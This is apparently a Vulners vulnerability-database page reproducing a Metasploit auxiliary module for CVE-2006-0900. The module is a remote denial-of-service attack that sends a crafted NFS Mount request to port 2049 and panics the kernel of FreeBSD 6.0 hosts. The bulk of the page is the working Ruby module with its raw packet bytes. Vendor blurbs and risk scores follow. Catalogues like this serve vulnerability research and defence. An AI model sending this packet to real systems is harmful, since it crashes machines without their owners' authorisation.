Lucene search
+L

FreeBSD Remote NFS RPC Request Denial of Service

🗓️ 19 Nov 2006 00:01:41Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 43 Views

FreeBSD Remote NFS RPC Request Denial of Service module causes kernel panic on FreeBSD 6.0 via specially-crafted NFS Mount reques

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FreeBSD Remote NFS RPC Request Denial of Service',
      'Description'    => %q{
        This module sends a specially-crafted NFS Mount request causing a
        kernel panic on host running FreeBSD 6.0.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '16838' ],
          [ 'OSVDB', '23511' ],
          [ 'CVE', '2006-0900' ],
        ]))

      register_options([Opt::RPORT(2049),])
  end

  def run
    connect

    pkt =  "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02"
    pkt << "\x00\x01\x86\xa5\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"

    print_status("Sending dos packet...")

    sock.put(pkt)

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2017 13:26Current
0.2Low risk
Vulners AI Score0.2
CVSS 27.8
EPSS0.64373
43